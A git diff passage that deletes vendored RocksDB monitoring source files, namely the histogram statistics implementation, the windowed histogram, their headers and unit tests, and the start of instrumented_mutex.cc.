-  valueIndexMap_ = {{1, 0}, {2, 1}};
-  double bucket_val = static_cast<double>(bucketValues_.back());
-  while ((bucket_val = 1.5 * bucket_val) <= static_cast<double>(port::kMaxUint64)) {
-    bucketValues_.push_back(static_cast<uint64_t>(bucket_val));
-    // Extracts two most significant digits to make histogram buckets more
-    // human-readable. E.g., 172 becomes 170.
-    uint64_t pow_of_ten = 1;
-    while (bucketValues_.back() / 10 > 10) {
-      bucketValues_.back() /= 10;
-      pow_of_ten *= 10;
-    }
-    bucketValues_.back() *= pow_of_ten;
-    valueIndexMap_[bucketValues_.back()] = bucketValues_.size() - 1;
-  }
-  maxBucketValue_ = bucketValues_.back();
-  minBucketValue_ = bucketValues_.front();
-}
-
-size_t HistogramBucketMapper::IndexForValue(const uint64_t value) const {
-  if (value >= maxBucketValue_) {
-    return bucketValues_.size() - 1;
-  } else if ( value >= minBucketValue_ ) {
-    std::map<uint64_t, uint64_t>::const_iterator lowerBound =
-      valueIndexMap_.lower_bound(value);
-    if (lowerBound != valueIndexMap_.end()) {
-      return static_cast<size_t>(lowerBound->second);
-    } else {
-      return 0;
-    }
-  } else {
-    return 0;
-  }
-}
-
-namespace {
-  const HistogramBucketMapper bucketMapper;
-}
-
-HistogramStat::HistogramStat()
-  : num_buckets_(bucketMapper.BucketCount()) {
-  assert(num_buckets_ == sizeof(buckets_) / sizeof(*buckets_));
-  Clear();
-}
-
-void HistogramStat::Clear() {
-  min_.store(bucketMapper.LastValue(), std::memory_order_relaxed);
-  max_.store(0, std::memory_order_relaxed);
-  num_.store(0, std::memory_order_relaxed);
-  sum_.store(0, std::memory_order_relaxed);
-  sum_squares_.store(0, std::memory_order_relaxed);
-  for (unsigned int b = 0; b < num_buckets_; b++) {
-    buckets_[b].store(0, std::memory_order_relaxed);
-  }
-};
-
-bool HistogramStat::Empty() const { return num() == 0; }
-
-void HistogramStat::Add(uint64_t value) {
-  // This function is designed to be lock free, as it's in the critical path
-  // of any operation. Each individual value is atomic and the order of updates
-  // by concurrent threads is tolerable.
-  const size_t index = bucketMapper.IndexForValue(value);
-  assert(index < num_buckets_);
-  buckets_[index].store(buckets_[index].load(std::memory_order_relaxed) + 1,
-                        std::memory_order_relaxed);
-
-  uint64_t old_min = min();
-  if (value < old_min) {
-    min_.store(value, std::memory_order_relaxed);
-  }
-
-  uint64_t old_max = max();
-  if (value > old_max) {
-    max_.store(value, std::memory_order_relaxed);
-  }
-
-  num_.store(num_.load(std::memory_order_relaxed) + 1,
-             std::memory_order_relaxed);
-  sum_.store(sum_.load(std::memory_order_relaxed) + value,
-             std::memory_order_relaxed);
-  sum_squares_.store(
-      sum_squares_.load(std::memory_order_relaxed) + value * value,
-      std::memory_order_relaxed);
-}
-
-void HistogramStat::Merge(const HistogramStat& other) {
-  // This function needs to be performned with the outer lock acquired
-  // However, atomic operation on every member is still need, since Add()
-  // requires no lock and value update can still happen concurrently
-  uint64_t old_min = min();
-  uint64_t other_min = other.min();
-  while (other_min < old_min &&
-         !min_.compare_exchange_weak(old_min, other_min)) {}
-
-  uint64_t old_max = max();
-  uint64_t other_max = other.max();
-  while (other_max > old_max &&
-         !max_.compare_exchange_weak(old_max, other_max)) {}
-
-  num_.fetch_add(other.num(), std::memory_order_relaxed);
-  sum_.fetch_add(other.sum(), std::memory_order_relaxed);
-  sum_squares_.fetch_add(other.sum_squares(), std::memory_order_relaxed);
-  for (unsigned int b = 0; b < num_buckets_; b++) {
-    buckets_[b].fetch_add(other.bucket_at(b), std::memory_order_relaxed);
-  }
-}
-
-double HistogramStat::Median() const {
-  return Percentile(50.0);
-}
-
-double HistogramStat::Percentile(double p) const {
-  double threshold = num() * (p / 100.0);
-  uint64_t cumulative_sum = 0;
-  for (unsigned int b = 0; b < num_buckets_; b++) {
-    uint64_t bucket_value = bucket_at(b);
-    cumulative_sum += bucket_value;
-    if (cumulative_sum >= threshold) {
-      // Scale linearly within this bucket
-      uint64_t left_point = (b == 0) ? 0 : bucketMapper.BucketLimit(b-1);
-      uint64_t right_point = bucketMapper.BucketLimit(b);
-      uint64_t left_sum = cumulative_sum - bucket_value;
-      uint64_t right_sum = cumulative_sum;
-      double pos = 0;
-      uint64_t right_left_diff = right_sum - left_sum;
-      if (right_left_diff != 0) {
-       pos = (threshold - left_sum) / right_left_diff;
-      }
-      double r = left_point + (right_point - left_point) * pos;
-      uint64_t cur_min = min();
-      uint64_t cur_max = max();
-      if (r < cur_min) r = static_cast<double>(cur_min);
-      if (r > cur_max) r = static_cast<double>(cur_max);
-      return r;
-    }
-  }
-  return static_cast<double>(max());
-}
-
-double HistogramStat::Average() const {
-  uint64_t cur_num = num();
-  uint64_t cur_sum = sum();
-  if (cur_num == 0) return 0;
-  return static_cast<double>(cur_sum) / static_cast<double>(cur_num);
-}
-
-double HistogramStat::StandardDeviation() const {
-  uint64_t cur_num = num();
-  uint64_t cur_sum = sum();
-  uint64_t cur_sum_squares = sum_squares();
-  if (cur_num == 0) return 0;
-  double variance =
-      static_cast<double>(cur_sum_squares * cur_num - cur_sum * cur_sum) /
-      static_cast<double>(cur_num * cur_num);
-  return sqrt(variance);
-}
-std::string HistogramStat::ToString() const {
-  uint64_t cur_num = num();
-  std::string r;
-  char buf[1650];
-  snprintf(buf, sizeof(buf),
-           "Count: %" PRIu64 " Average: %.4f  StdDev: %.2f\n",
-           cur_num, Average(), StandardDeviation());
-  r.append(buf);
-  snprintf(buf, sizeof(buf),
-           "Min: %" PRIu64 "  Median: %.4f  Max: %" PRIu64 "\n",
-           (cur_num == 0 ? 0 : min()), Median(), (cur_num == 0 ? 0 : max()));
-  r.append(buf);
-  snprintf(buf, sizeof(buf),
-           "Percentiles: "
-           "P50: %.2f P75: %.2f P99: %.2f P99.9: %.2f P99.99: %.2f\n",
-           Percentile(50), Percentile(75), Percentile(99), Percentile(99.9),
-           Percentile(99.99));
-  r.append(buf);
-  r.append("------------------------------------------------------\n");
-  const double mult = 100.0 / cur_num;
-  uint64_t cumulative_sum = 0;
-  for (unsigned int b = 0; b < num_buckets_; b++) {
-    uint64_t bucket_value = bucket_at(b);
-    if (bucket_value <= 0.0) continue;
-    cumulative_sum += bucket_value;
-    snprintf(buf, sizeof(buf),
-             "[ %7" PRIu64 ", %7" PRIu64 " ) %8" PRIu64 " %7.3f%% %7.3f%% ",
-             (b == 0) ? 0 : bucketMapper.BucketLimit(b-1),  // left
-              bucketMapper.BucketLimit(b),  // right
-              bucket_value,                   // count
-             (mult * bucket_value),           // percentage
-             (mult * cumulative_sum));       // cumulative percentage
-    r.append(buf);
-
-    // Add hash marks based on percentage; 20 marks for 100%.
-    size_t marks = static_cast<size_t>(mult * bucket_value / 5 + 0.5);
-    r.append(marks, '#');
-    r.push_back('\n');
-  }
-  return r;
-}
-
-void HistogramStat::Data(HistogramData * const data) const {
-  assert(data);
-  data->median = Median();
-  data->percentile95 = Percentile(95);
-  data->percentile99 = Percentile(99);
-  data->max = static_cast<double>(max());
-  data->average = Average();
-  data->standard_deviation = StandardDeviation();
-}
-
-void HistogramImpl::Clear() {
-  std::lock_guard<std::mutex> lock(mutex_);
-  stats_.Clear();
-}
-
-bool HistogramImpl::Empty() const {
-  return stats_.Empty();
-}
-
-void HistogramImpl::Add(uint64_t value) {
-  stats_.Add(value);
-}
-
-void HistogramImpl::Merge(const Histogram& other) {
-  if (strcmp(Name(), other.Name()) == 0) {
-    Merge(
-        *static_cast_with_check<const HistogramImpl, const Histogram>(&other));
-  }
-}
-
-void HistogramImpl::Merge(const HistogramImpl& other) {
-  std::lock_guard<std::mutex> lock(mutex_);
-  stats_.Merge(other.stats_);
-}
-
-double HistogramImpl::Median() const {
-  return stats_.Median();
-}
-
-double HistogramImpl::Percentile(double p) const {
-  return stats_.Percentile(p);
-}
-
-double HistogramImpl::Average() const {
-  return stats_.Average();
-}
-
-double HistogramImpl::StandardDeviation() const {
- return stats_.StandardDeviation();
-}
-
-std::string HistogramImpl::ToString() const {
-  return stats_.ToString();
-}
-
-void HistogramImpl::Data(HistogramData * const data) const {
-  stats_.Data(data);
-}
-
-} // namespace levedb
diff --git a/thirdparty/rocksdb/monitoring/histogram.h b/thirdparty/rocksdb/monitoring/histogram.h
deleted file mode 100644
index 6bf2e9e..0000000
--- a/thirdparty/rocksdb/monitoring/histogram.h
+++ /dev/null
@@ -1,149 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-// Copyright (c) 2011 The LevelDB Authors. All rights reserved.
-// Use of this source code is governed by a BSD-style license that can be
-// found in the LICENSE file. See the AUTHORS file for names of contributors.
-
-#pragma once
-#include "rocksdb/statistics.h"
-
-#include <cassert>
-#include <string>
-#include <vector>
-#include <map>
-#include <mutex>
-
-namespace rocksdb {
-
-class HistogramBucketMapper {
- public:
-
-  HistogramBucketMapper();
-
-  // converts a value to the bucket index.
-  size_t IndexForValue(uint64_t value) const;
-  // number of buckets required.
-
-  size_t BucketCount() const {
-    return bucketValues_.size();
-  }
-
-  uint64_t LastValue() const {
-    return maxBucketValue_;
-  }
-
-  uint64_t FirstValue() const {
-    return minBucketValue_;
-  }
-
-  uint64_t BucketLimit(const size_t bucketNumber) const {
-    assert(bucketNumber < BucketCount());
-    return bucketValues_[bucketNumber];
-  }
-
- private:
-  std::vector<uint64_t> bucketValues_;
-  uint64_t maxBucketValue_;
-  uint64_t minBucketValue_;
-  std::map<uint64_t, uint64_t> valueIndexMap_;
-};
-
-struct HistogramStat {
-  HistogramStat();
-  ~HistogramStat() {}
-
-  HistogramStat(const HistogramStat&) = delete;
-  HistogramStat& operator=(const HistogramStat&) = delete;
-
-  void Clear();
-  bool Empty() const;
-  void Add(uint64_t value);
-  void Merge(const HistogramStat& other);
-
-  inline uint64_t min() const { return min_.load(std::memory_order_relaxed); }
-  inline uint64_t max() const { return max_.load(std::memory_order_relaxed); }
-  inline uint64_t num() const { return num_.load(std::memory_order_relaxed); }
-  inline uint64_t sum() const { return sum_.load(std::memory_order_relaxed); }
-  inline uint64_t sum_squares() const {
-    return sum_squares_.load(std::memory_order_relaxed);
-  }
-  inline uint64_t bucket_at(size_t b) const {
-    return buckets_[b].load(std::memory_order_relaxed);
-  }
-
-  double Median() const;
-  double Percentile(double p) const;
-  double Average() const;
-  double StandardDeviation() const;
-  void Data(HistogramData* const data) const;
-  std::string ToString() const;
-
-  // To be able to use HistogramStat as thread local variable, it
-  // cannot have dynamic allocated member. That's why we're
-  // using manually values from BucketMapper
-  std::atomic_uint_fast64_t min_;
-  std::atomic_uint_fast64_t max_;
-  std::atomic_uint_fast64_t num_;
-  std::atomic_uint_fast64_t sum_;
-  std::atomic_uint_fast64_t sum_squares_;
-  std::atomic_uint_fast64_t buckets_[109]; // 109==BucketMapper::BucketCount()
-  const uint64_t num_buckets_;
-};
-
-class Histogram {
-public:
-  Histogram() {}
-  virtual ~Histogram() {};
-
-  virtual void Clear() = 0;
-  virtual bool Empty() const = 0;
-  virtual void Add(uint64_t value) = 0;
-  virtual void Merge(const Histogram&) = 0;
-
-  virtual std::string ToString() const = 0;
-  virtual const char* Name() const = 0;
-  virtual uint64_t min() const = 0;
-  virtual uint64_t max() const = 0;
-  virtual uint64_t num() const = 0;
-  virtual double Median() const = 0;
-  virtual double Percentile(double p) const = 0;
-  virtual double Average() const = 0;
-  virtual double StandardDeviation() const = 0;
-  virtual void Data(HistogramData* const data) const = 0;
-};
-
-class HistogramImpl : public Histogram {
- public:
-  HistogramImpl() { Clear(); }
-
-  HistogramImpl(const HistogramImpl&) = delete;
-  HistogramImpl& operator=(const HistogramImpl&) = delete;
-
-  virtual void Clear() override;
-  virtual bool Empty() const override;
-  virtual void Add(uint64_t value) override;
-  virtual void Merge(const Histogram& other) override;
-  void Merge(const HistogramImpl& other);
-
-  virtual std::string ToString() const override;
-  virtual const char* Name() const override { return "HistogramImpl"; }
-  virtual uint64_t min() const override { return stats_.min(); }
-  virtual uint64_t max() const override { return stats_.max(); }
-  virtual uint64_t num() const override { return stats_.num(); }
-  virtual double Median() const override;
-  virtual double Percentile(double p) const override;
-  virtual double Average() const override;
-  virtual double StandardDeviation() const override;
-  virtual void Data(HistogramData* const data) const override;
-
-  virtual ~HistogramImpl() {}
-
- private:
-  HistogramStat stats_;
-  std::mutex mutex_;
-};
-
-}  // namespace rocksdb
diff --git a/thirdparty/rocksdb/monitoring/histogram_test.cc b/thirdparty/rocksdb/monitoring/histogram_test.cc
deleted file mode 100644
index b4e3c98..0000000
--- a/thirdparty/rocksdb/monitoring/histogram_test.cc
+++ /dev/null
@@ -1,208 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-#include <cmath>
-
-#include "monitoring/histogram.h"
-#include "monitoring/histogram_windowing.h"
-#include "util/testharness.h"
-
-namespace rocksdb {
-
-class HistogramTest : public testing::Test {};
-
-namespace {
-  const double kIota = 0.1;
-  const HistogramBucketMapper bucketMapper;
-  Env* env = Env::Default();
-}
-
-void PopulateHistogram(Histogram& histogram,
-             uint64_t low, uint64_t high, uint64_t loop = 1) {
-  for (; loop > 0; loop--) {
-    for (uint64_t i = low; i <= high; i++) {
-      histogram.Add(i);
-    }
-  }
-}
-
-void BasicOperation(Histogram& histogram) {
-  PopulateHistogram(histogram, 1, 110, 10); // fill up to bucket [70, 110)
-
-  HistogramData data;
-  histogram.Data(&data);
-
-  ASSERT_LE(fabs(histogram.Percentile(100.0) - 110.0), kIota);
-  ASSERT_LE(fabs(data.percentile99 - 108.9), kIota);  // 99 * 110 / 100
-  ASSERT_LE(fabs(data.percentile95 - 104.5), kIota);  // 95 * 110 / 100
-  ASSERT_LE(fabs(data.median - 55.0), kIota);  // 50 * 110 / 100
-  ASSERT_EQ(data.average, 55.5);  // (1 + 110) / 2
-}
-
-void MergeHistogram(Histogram& histogram, Histogram& other) {
-  PopulateHistogram(histogram, 1, 100);
-  PopulateHistogram(other, 101, 250);
-  histogram.Merge(other);
-
-  HistogramData data;
-  histogram.Data(&data);
-
-  ASSERT_LE(fabs(histogram.Percentile(100.0) - 250.0), kIota);
-  ASSERT_LE(fabs(data.percentile99 - 247.5), kIota);  // 99 * 250 / 100
-  ASSERT_LE(fabs(data.percentile95 - 237.5), kIota);  // 95 * 250 / 100
-  ASSERT_LE(fabs(data.median - 125.0), kIota);  // 50 * 250 / 100
-  ASSERT_EQ(data.average, 125.5);  // (1 + 250) / 2
-}
-
-void EmptyHistogram(Histogram& histogram) {
-  ASSERT_EQ(histogram.min(), bucketMapper.LastValue());
-  ASSERT_EQ(histogram.max(), 0);
-  ASSERT_EQ(histogram.num(), 0);
-  ASSERT_EQ(histogram.Median(), 0.0);
-  ASSERT_EQ(histogram.Percentile(85.0), 0.0);
-  ASSERT_EQ(histogram.Average(), 0.0);
-  ASSERT_EQ(histogram.StandardDeviation(), 0.0);
-}
-
-void ClearHistogram(Histogram& histogram) {
-  for (uint64_t i = 1; i <= 100; i++) {
-    histogram.Add(i);
-  }
-  histogram.Clear();
-  ASSERT_TRUE(histogram.Empty());
-  ASSERT_EQ(histogram.Median(), 0);
-  ASSERT_EQ(histogram.Percentile(85.0), 0);
-  ASSERT_EQ(histogram.Average(), 0);
-}
-
-TEST_F(HistogramTest, BasicOperation) {
-  HistogramImpl histogram;
-  BasicOperation(histogram);
-
-  HistogramWindowingImpl histogramWindowing;
-  BasicOperation(histogramWindowing);
-}
-
-TEST_F(HistogramTest, MergeHistogram) {
-  HistogramImpl histogram;
-  HistogramImpl other;
-  MergeHistogram(histogram, other);
-
-  HistogramWindowingImpl histogramWindowing;
-  HistogramWindowingImpl otherWindowing;
-  MergeHistogram(histogramWindowing, otherWindowing);
-}
-
-TEST_F(HistogramTest, EmptyHistogram) {
-  HistogramImpl histogram;
-  EmptyHistogram(histogram);
-
-  HistogramWindowingImpl histogramWindowing;
-  EmptyHistogram(histogramWindowing);
-}
-
-TEST_F(HistogramTest, ClearHistogram) {
-  HistogramImpl histogram;
-  ClearHistogram(histogram);
-
-  HistogramWindowingImpl histogramWindowing;
-  ClearHistogram(histogramWindowing);
-}
-
-TEST_F(HistogramTest, HistogramWindowingExpire) {
-  uint64_t num_windows = 3;
-  int micros_per_window = 1000000;
-  uint64_t min_num_per_window = 0;
-
-  HistogramWindowingImpl
-      histogramWindowing(num_windows, micros_per_window, min_num_per_window);
-
-  PopulateHistogram(histogramWindowing, 1, 1, 100);
-  env->SleepForMicroseconds(micros_per_window);
-  ASSERT_EQ(histogramWindowing.num(), 100);
-  ASSERT_EQ(histogramWindowing.min(), 1);
-  ASSERT_EQ(histogramWindowing.max(), 1);
-  ASSERT_EQ(histogramWindowing.Average(), 1);
-
-  PopulateHistogram(histogramWindowing, 2, 2, 100);
-  env->SleepForMicroseconds(micros_per_window);
-  ASSERT_EQ(histogramWindowing.num(), 200);
-  ASSERT_EQ(histogramWindowing.min(), 1);
-  ASSERT_EQ(histogramWindowing.max(), 2);
-  ASSERT_EQ(histogramWindowing.Average(), 1.5);
-
-  PopulateHistogram(histogramWindowing, 3, 3, 100);
-  env->SleepForMicroseconds(micros_per_window);
-  ASSERT_EQ(histogramWindowing.num(), 300);
-  ASSERT_EQ(histogramWindowing.min(), 1);
-  ASSERT_EQ(histogramWindowing.max(), 3);
-  ASSERT_EQ(histogramWindowing.Average(), 2.0);
-
-  // dropping oldest window with value 1, remaining 2 ~ 4
-  PopulateHistogram(histogramWindowing, 4, 4, 100);
-  env->SleepForMicroseconds(micros_per_window);
-  ASSERT_EQ(histogramWindowing.num(), 300);
-  ASSERT_EQ(histogramWindowing.min(), 2);
-  ASSERT_EQ(histogramWindowing.max(), 4);
-  ASSERT_EQ(histogramWindowing.Average(), 3.0);
-
-  // dropping oldest window with value 2, remaining 3 ~ 5
-  PopulateHistogram(histogramWindowing, 5, 5, 100);
-  env->SleepForMicroseconds(micros_per_window);
-  ASSERT_EQ(histogramWindowing.num(), 300);
-  ASSERT_EQ(histogramWindowing.min(), 3);
-  ASSERT_EQ(histogramWindowing.max(), 5);
-  ASSERT_EQ(histogramWindowing.Average(), 4.0);
-}
-
-TEST_F(HistogramTest, HistogramWindowingMerge) {
-  uint64_t num_windows = 3;
-  int micros_per_window = 1000000;
-  uint64_t min_num_per_window = 0;
-
-  HistogramWindowingImpl
-      histogramWindowing(num_windows, micros_per_window, min_num_per_window);
-  HistogramWindowingImpl
-      otherWindowing(num_windows, micros_per_window, min_num_per_window);
-
-  PopulateHistogram(histogramWindowing, 1, 1, 100);
-  PopulateHistogram(otherWindowing, 1, 1, 100);
-  env->SleepForMicroseconds(micros_per_window);
-
-  PopulateHistogram(histogramWindowing, 2, 2, 100);
-  PopulateHistogram(otherWindowing, 2, 2, 100);
-  env->SleepForMicroseconds(micros_per_window);
-
-  PopulateHistogram(histogramWindowing, 3, 3, 100);
-  PopulateHistogram(otherWindowing, 3, 3, 100);
-  env->SleepForMicroseconds(micros_per_window);
-
-  histogramWindowing.Merge(otherWindowing);
-  ASSERT_EQ(histogramWindowing.num(), 600);
-  ASSERT_EQ(histogramWindowing.min(), 1);
-  ASSERT_EQ(histogramWindowing.max(), 3);
-  ASSERT_EQ(histogramWindowing.Average(), 2.0);
-
-  // dropping oldest window with value 1, remaining 2 ~ 4
-  PopulateHistogram(histogramWindowing, 4, 4, 100);
-  env->SleepForMicroseconds(micros_per_window);
-  ASSERT_EQ(histogramWindowing.num(), 500);
-  ASSERT_EQ(histogramWindowing.min(), 2);
-  ASSERT_EQ(histogramWindowing.max(), 4);
-
-  // dropping oldest window with value 2, remaining 3 ~ 5
-  PopulateHistogram(histogramWindowing, 5, 5, 100);
-  env->SleepForMicroseconds(micros_per_window);
-  ASSERT_EQ(histogramWindowing.num(), 400);
-  ASSERT_EQ(histogramWindowing.min(), 3);
-  ASSERT_EQ(histogramWindowing.max(), 5);
-}
-
-}  // namespace rocksdb
-
-int main(int argc, char** argv) {
-  ::testing::InitGoogleTest(&argc, argv);
-  return RUN_ALL_TESTS();
-}
diff --git a/thirdparty/rocksdb/monitoring/histogram_windowing.cc b/thirdparty/rocksdb/monitoring/histogram_windowing.cc
deleted file mode 100644
index 28d8265..0000000
--- a/thirdparty/rocksdb/monitoring/histogram_windowing.cc
+++ /dev/null
@@ -1,197 +0,0 @@
-//  Copyright (c) 2013, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-// Copyright (c) 2011 The LevelDB Authors. All rights reserved.
-// Use of this source code is governed by a BSD-style license that can be
-// found in the LICENSE file. See the AUTHORS file for names of contributors.
-
-#include "monitoring/histogram_windowing.h"
-#include "monitoring/histogram.h"
-#include "util/cast_util.h"
-
-#include <algorithm>
-
-namespace rocksdb {
-
-HistogramWindowingImpl::HistogramWindowingImpl() {
-  env_ = Env::Default();
-  window_stats_.reset(new HistogramStat[num_windows_]);
-  Clear();
-}
-
-HistogramWindowingImpl::HistogramWindowingImpl(
-    uint64_t num_windows,
-    uint64_t micros_per_window,
-    uint64_t min_num_per_window) :
-      num_windows_(num_windows),
-      micros_per_window_(micros_per_window),
-      min_num_per_window_(min_num_per_window) {
-  env_ = Env::Default();
-  window_stats_.reset(new HistogramStat[num_windows_]);
-  Clear();
-}
-
-HistogramWindowingImpl::~HistogramWindowingImpl() {
-}
-
-void HistogramWindowingImpl::Clear() {
-  std::lock_guard<std::mutex> lock(mutex_);
-
-  stats_.Clear();
-  for (size_t i = 0; i < num_windows_; i++) {
-    window_stats_[i].Clear();
-  }
-  current_window_.store(0, std::memory_order_relaxed);
-  last_swap_time_.store(env_->NowMicros(), std::memory_order_relaxed);
-}
-
-bool HistogramWindowingImpl::Empty() const { return stats_.Empty(); }
-
-// This function is designed to be lock free, as it's in the critical path
-// of any operation.
-// Each individual value is atomic, it is just that some samples can go
-// in the older bucket which is tolerable.
-void HistogramWindowingImpl::Add(uint64_t value){
-  TimerTick();
-
-  // Parent (global) member update
-  stats_.Add(value);
-
-  // Current window update
-  window_stats_[current_window()].Add(value);
-}
-
-void HistogramWindowingImpl::Merge(const Histogram& other) {
-  if (strcmp(Name(), other.Name()) == 0) {
-    Merge(
-        *static_cast_with_check<const HistogramWindowingImpl, const Histogram>(
-            &other));
-  }
-}
-
-void HistogramWindowingImpl::Merge(const HistogramWindowingImpl& other) {
-  std::lock_guard<std::mutex> lock(mutex_);
-  stats_.Merge(other.stats_);
-
-  if (stats_.num_buckets_ != other.stats_.num_buckets_ ||
-      micros_per_window_ != other.micros_per_window_) {
-    return;
-  }
-
-  uint64_t cur_window = current_window();
-  uint64_t other_cur_window = other.current_window();
-  // going backwards for alignment
-  for (unsigned int i = 0;
-                    i < std::min(num_windows_, other.num_windows_); i++) {
-    uint64_t window_index =
-        (cur_window + num_windows_ - i) % num_windows_;
-    uint64_t other_window_index =
-        (other_cur_window + other.num_windows_ - i) % other.num_windows_;
-
-    window_stats_[window_index].Merge(other.window_stats_[other_window_index]);
-  }
-}
-
-std::string HistogramWindowingImpl::ToString() const {
-  return stats_.ToString();
-}
-
-double HistogramWindowingImpl::Median() const {
-  return Percentile(50.0);
-}
-
-double HistogramWindowingImpl::Percentile(double p) const {
-  // Retry 3 times in total
-  for (int retry = 0; retry < 3; retry++) {
-    uint64_t start_num = stats_.num();
-    double result = stats_.Percentile(p);
-    // Detect if swap buckets or Clear() was called during calculation
-    if (stats_.num() >= start_num) {
-      return result;
-    }
-  }
-  return 0.0;
-}
-
-double HistogramWindowingImpl::Average() const {
-  return stats_.Average();
-}
-
-double HistogramWindowingImpl::StandardDeviation() const {
-  return stats_.StandardDeviation();
-}
-
-void HistogramWindowingImpl::Data(HistogramData * const data) const {
-  stats_.Data(data);
-}
-
-void HistogramWindowingImpl::TimerTick() {
-  uint64_t curr_time = env_->NowMicros();
-  if (curr_time - last_swap_time() > micros_per_window_ &&
-      window_stats_[current_window()].num() >= min_num_per_window_) {
-    SwapHistoryBucket();
-  }
-}
-
-void HistogramWindowingImpl::SwapHistoryBucket() {
-  // Threads executing Add() would be competing for this mutex, the first one
-  // who got the metex would take care of the bucket swap, other threads
-  // can skip this.
-  // If mutex is held by Merge() or Clear(), next Add() will take care of the
-  // swap, if needed.
-  if (mutex_.try_lock()) {
-    last_swap_time_.store(env_->NowMicros(), std::memory_order_relaxed);
-
-    uint64_t curr_window = current_window();
-    uint64_t next_window = (curr_window == num_windows_ - 1) ?
-                                                    0 : curr_window + 1;
-
-    // subtract next buckets from totals and swap to next buckets
-    HistogramStat& stats_to_drop = window_stats_[next_window];
-
-    if (!stats_to_drop.Empty()) {
-      for (size_t b = 0; b < stats_.num_buckets_; b++){
-        stats_.buckets_[b].fetch_sub(
-            stats_to_drop.bucket_at(b), std::memory_order_relaxed);
-      }
-
-      if (stats_.min() == stats_to_drop.min()) {
-        uint64_t new_min = std::numeric_limits<uint64_t>::max();
-        for (unsigned int i = 0; i < num_windows_; i++) {
-          if (i != next_window) {
-            uint64_t m = window_stats_[i].min();
-            if (m < new_min) new_min = m;
-          }
-        }
-        stats_.min_.store(new_min, std::memory_order_relaxed);
-      }
-
-      if (stats_.max() == stats_to_drop.max()) {
-        uint64_t new_max = 0;
-        for (unsigned int i = 0; i < num_windows_; i++) {
-          if (i != next_window) {
-            uint64_t m = window_stats_[i].max();
-            if (m > new_max) new_max = m;
-          }
-        }
-        stats_.max_.store(new_max, std::memory_order_relaxed);
-      }
-
-      stats_.num_.fetch_sub(stats_to_drop.num(), std::memory_order_relaxed);
-      stats_.sum_.fetch_sub(stats_to_drop.sum(), std::memory_order_relaxed);
-      stats_.sum_squares_.fetch_sub(
-                  stats_to_drop.sum_squares(), std::memory_order_relaxed);
-
-      stats_to_drop.Clear();
-    }
-
-    // advance to next window bucket
-    current_window_.store(next_window, std::memory_order_relaxed);
-
-    mutex_.unlock();
-  }
-}
-
-}  // namespace rocksdb
diff --git a/thirdparty/rocksdb/monitoring/histogram_windowing.h b/thirdparty/rocksdb/monitoring/histogram_windowing.h
deleted file mode 100644
index 2a6d0dd..0000000
--- a/thirdparty/rocksdb/monitoring/histogram_windowing.h
+++ /dev/null
@@ -1,80 +0,0 @@
-//  Copyright (c) 2013, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-// Copyright (c) 2011 The LevelDB Authors. All rights reserved.
-// Use of this source code is governed by a BSD-style license that can be
-// found in the LICENSE file. See the AUTHORS file for names of contributors.
-
-#pragma once
-
-#include "monitoring/histogram.h"
-#include "rocksdb/env.h"
-
-namespace rocksdb {
-
-class HistogramWindowingImpl : public Histogram
-{
-public:
-  HistogramWindowingImpl();
-  HistogramWindowingImpl(uint64_t num_windows,
-                         uint64_t micros_per_window,
-                         uint64_t min_num_per_window);
-
-  HistogramWindowingImpl(const HistogramImpl&) = delete;
-  HistogramWindowingImpl& operator=(const HistogramImpl&) = delete;
-
-  ~HistogramWindowingImpl();
-
-  virtual void Clear() override;
-  virtual bool Empty() const override;
-  virtual void Add(uint64_t value) override;
-  virtual void Merge(const Histogram& other) override;
-  void Merge(const HistogramWindowingImpl& other);
-
-  virtual std::string ToString() const override;
-  virtual const char* Name() const override { return "HistogramWindowingImpl"; }
-  virtual uint64_t min() const override { return stats_.min(); }
-  virtual uint64_t max() const override { return stats_.max(); }
-  virtual uint64_t num() const override { return stats_.num(); }
-  virtual double Median() const override;
-  virtual double Percentile(double p) const override;
-  virtual double Average() const override;
-  virtual double StandardDeviation() const override;
-  virtual void Data(HistogramData* const data) const override;
-
-private:
-  void TimerTick();
-  void SwapHistoryBucket();
-  inline uint64_t current_window() const {
-    return current_window_.load(std::memory_order_relaxed);
-  }
-  inline uint64_t last_swap_time() const{
-    return last_swap_time_.load(std::memory_order_relaxed);
-  }
-
-  Env* env_;
-  std::mutex mutex_;
-
-  // Aggregated stats over windows_stats_, all the computation is done
-  // upon aggregated values
-  HistogramStat stats_;
-
-  // This is a circular array representing the latest N time-windows.
-  // Each entry stores a time-window of data. Expiration is done
-  // on window-based.
-  std::unique_ptr<HistogramStat[]> window_stats_;
-
-  std::atomic_uint_fast64_t current_window_;
-  std::atomic_uint_fast64_t last_swap_time_;
-
-  // Following parameters are configuable
-  uint64_t num_windows_ = 5;
-  uint64_t micros_per_window_ = 60000000;
-  // By default, don't care about the number of values in current window
-  // when decide whether to swap windows or not.
-  uint64_t min_num_per_window_ = 0;
-};
-
-}  // namespace rocksdb
\ No newline at end of file
diff --git a/thirdparty/rocksdb/monitoring/instrumented_mutex.cc b/thirdparty/rocksdb/monitoring/instrumented_mutex.cc
deleted file mode 100644
index c07a5a1..0000000
--- a/thirdparty/rocksdb/monitoring/instrumented_mutex.cc
+++ /dev/null
@@ -1,91 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-#include "monitoring/instrumented_mutex.h"
-#include "monitoring/perf_context_imp.h"
-#include "monitoring/thread_status_util.h"
-#include "util/sync_point.h"
-
-namespace rocksdb {
-namespace {
-bool ShouldReportToStats(Env* env, Statistics* stats) {
-  return env != nullptr && stats != nullptr &&
-          stats->stats_level_ > kExceptTimeForMutex;
-}
-}  // namespace
-
